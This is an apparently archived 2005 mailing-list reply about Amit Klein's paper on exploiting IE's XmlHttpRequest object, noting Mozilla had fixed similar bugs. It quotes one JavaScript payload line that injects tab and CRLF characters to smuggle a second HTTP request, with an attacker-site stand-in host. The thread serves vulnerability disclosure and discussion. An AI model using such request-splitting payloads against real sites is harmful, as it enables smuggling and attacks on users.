<<< Date Index >>>     <<< Thread Index >>>

Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein



On 27 Sep 2005 at 21:34, Yutaka OIWA wrote:

> Hello Amit,
> 
> "Amit Klein (AKsecurity)" <aksecurity@xxxxxxxxxx> writes:
> 
> >   x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP
> >   /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target
> >   .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP
> >   /1.0\r\nFoobar:","http://www.attacker.site/",false);
> 
> This kind of bugs are already fixed in recent Mozilla browsers,
> as shown in your reference [4].
> 
> > [4] "setRequestHeader can be exploited using newline characters", 
> > Bugzilla bug 297078
> > https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and 
> > "XMLHttpRequest allows dangerous request headers to be set", 
> > Bugzilla bug 302263
> > https://bugzilla.mozilla.org/show_bug.cgi?id=302263
> 
> see comment #15 of bug 297078.
> 
> https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15
>

Oh. I missed this. So - very good. And thanks for bringing this to Bugtraq's 
and mine 
attention. And while we're here - kudos for your work!

-Amit